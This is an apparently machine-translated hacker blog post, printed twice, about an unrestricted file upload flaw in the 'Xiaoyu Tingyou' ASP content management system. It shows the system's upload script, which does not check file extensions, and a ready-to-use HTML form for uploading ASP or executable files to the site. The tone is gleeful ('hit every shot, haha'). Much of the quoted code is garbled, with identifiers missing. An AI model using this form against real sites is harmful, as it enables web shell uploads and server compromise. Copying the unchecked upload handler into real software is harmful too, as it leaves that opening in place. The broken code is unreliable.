(The author leaves us a backdoor?)
Xiaoyu Tingyou website content management system:
Currently the most powerful whole site system: contains the modules necessary for general websites such as news articles, downloads, films, pictures, music, etc., and are independent and closely connected with each other. They are unlimitedly classified, freely called, support templates, and all front desks generate html to maximize the saving of system resources. The best choice for large and medium-sized portals.
The content page generates html, which is relatively safe. I looked at the background and it seems that there is no big problem.
But when you go to the upload directory, you will find two files
There are verifications in it, but there are no restrictions. Let's take a look at the source code:
CODE:
<link rel="stylesheet" type="text/css" href="../admin/">
<script language="JavaScript">
<!-- Hide from older browsers...
//Function to add pic
function Addpic(imagePath){
();
(InsertImage, false, imagePath);
}
// -->
</script>
<% =1900 %>
<%
UpFilePath="NewsIMG/"
fileweb="UPLOAD/"
nameset =1
pathset =0
dim i
i=1
%>
<%
function makefilename(fname)
fname = now()
fname = replace(fname,"-","")
fname = replace(fname," ","")
fname = replace(fname,":","")
makefilename=fname
end function
%>
<!--#include FILE="upload_5xsoft.inc"-->
<%
dim upload,file,formName,iCount
dim url,url1
set upload=new upload_5xSoft Create an upload object
iCount=0
for each formName in List all uploaded files
set file=(formName) Generate a file object
if >0 then
fname = makefilename(now()) & iCount & "." & GetExtendName()
(UpFilePath&fname) Save the file
iCount=iCount+1
"Picture"&i&" <input type=""text"" name="""&i&"" size=""55"" style=""border-style: solid; border-width: 1"" value=""../"&fileweb&UpFilePath&fname&"""><br>[ <a href=# onclick=""Addpic(../"&fileweb&UpFilePath&fname&" "">Click here to add the picture "&i&" to the editor</a> ]<br>"
i=i+1
set file=nothing
end if
next
set upload=nothingDelete this object
function GetExtendName(FileName)
dim ExtName
ExtName = LCase(FileName)
ExtName = right(ExtName,3)
ExtName = right(ExtName,3-Instr(ExtName,"."))
GetExtendName = ExtName
end function
%>
[Copy to clipboard]
Haha, you can buy an upload page yourself and upload it directly, even the exe file is OK, let alone asp or something.
And there is an address after uploading, which is simply a backdoor left by the author.
Utilizing files:
CODE:
<html>
<head>
<title>File Upload</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#D6EF7E" text="#000000">
<form name="form1" method="post" action="/upload/" enctype="multipart/form-data">
<input type="hidden" name="act" value="upload">
<div align="center">
<center>
<table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">
<tr>
<th height="16" align="left" valign="middle">
<div align="center">
<b>Picture Upload</b>
</div>
</th>
</tr>
<tr align="left" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="1" valign="top">
<input type="file" name="file1" style="width:200" class="tx1">
</td>
</tr>
<tr align="center" valign="middle">
<td align="left" height="5" bgcolor="#FFFFFF">
</td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="28">
<input type="submit" name="Submit" value="· Submit ·" class="bt">
<input type="reset" name="Submit2" value="· Re-execution·" class="bt"></td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td height="14" bgcolor="#FFFFFF"> </td>
</tr>
</table>
</center>
</div>
</form>
</body>
</html>
[Copy to clipboard]
It's hit every shot, haha. It's fun.
My Blog
Article: Bad
Source: Evil Octal Information Security Team
Xiaoyu Tingyou website content management system:
Currently the most powerful whole site system: contains the modules necessary for general websites such as news articles, downloads, films, pictures, music, etc., and are independent and closely connected with each other. They are unlimitedly classified, freely called, support templates, and all front desks generate html to maximize the saving of system resources. The best choice for large and medium-sized portals.
The content page generates html, which is relatively safe. I looked at the background and it seems that there is no big problem.
But when you go to the upload directory, you will find two files
There are verifications in it, but there are no restrictions. Let's take a look at the source code:
CODE:
<link rel="stylesheet" type="text/css" href="../admin/">
<script language="JavaScript">
<!-- Hide from older browsers...
//Function to add pic
function Addpic(imagePath){
();
(InsertImage, false, imagePath);
}
// -->
</script>
<% =1900 %>
<%
UpFilePath="NewsIMG/"
fileweb="UPLOAD/"
nameset =1
pathset =0
dim i
i=1
%>
<%
function makefilename(fname)
fname = now()
fname = replace(fname,"-","")
fname = replace(fname," ","")
fname = replace(fname,":","")
makefilename=fname
end function
%>
<!--#include FILE="upload_5xsoft.inc"-->
<%
dim upload,file,formName,iCount
dim url,url1
set upload=new upload_5xSoft Create an upload object
iCount=0
for each formName in List all uploaded files
set file=(formName) Generate a file object
if >0 then
fname = makefilename(now()) & iCount & "." & GetExtendName()
(UpFilePath&fname) Save the file
iCount=iCount+1
"Picture"&i&" <input type=""text"" name="""&i&"" size=""55"" style=""border-style: solid; border-width: 1"" value=""../"&fileweb&UpFilePath&fname&"""><br>[ <a href=# onclick=""Addpic(../"&fileweb&UpFilePath&fname&" "">Click here to add the picture "&i&" to the editor</a> ]<br>"
i=i+1
set file=nothing
end if
next
set upload=nothingDelete this object
function GetExtendName(FileName)
dim ExtName
ExtName = LCase(FileName)
ExtName = right(ExtName,3)
ExtName = right(ExtName,3-Instr(ExtName,"."))
GetExtendName = ExtName
end function
%>
[Copy to clipboard]
Haha, you can buy an upload page yourself and upload it directly, even the exe file is OK, let alone asp or something.
And there is an address after uploading, which is simply a backdoor left by the author.
Utilizing files:
CODE:
<html>
<head>
<title>File Upload</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#D6EF7E" text="#000000">
<form name="form1" method="post" action="/upload/" enctype="multipart/form-data">
<input type="hidden" name="act" value="upload">
<div align="center">
<center>
<table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">
<tr>
<th height="16" align="left" valign="middle">
<div align="center">
<b>Picture Upload</b>
</div>
</th>
</tr>
<tr align="left" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="1" valign="top">
<input type="file" name="file1" style="width:200" class="tx1">
</td>
</tr>
<tr align="center" valign="middle">
<td align="left" height="5" bgcolor="#FFFFFF">
</td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="28">
<input type="submit" name="Submit" value="· Submit ·" class="bt">
<input type="reset" name="Submit2" value="· Re-execution·" class="bt"></td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td height="14" bgcolor="#FFFFFF"> </td>
</tr>
</table>
</center>
</div>
</form>
</body>
</html>
[Copy to clipboard]
It's hit every shot, haha. It's fun.
My Blog
Article: Bad
Source: Evil Octal Information Security Team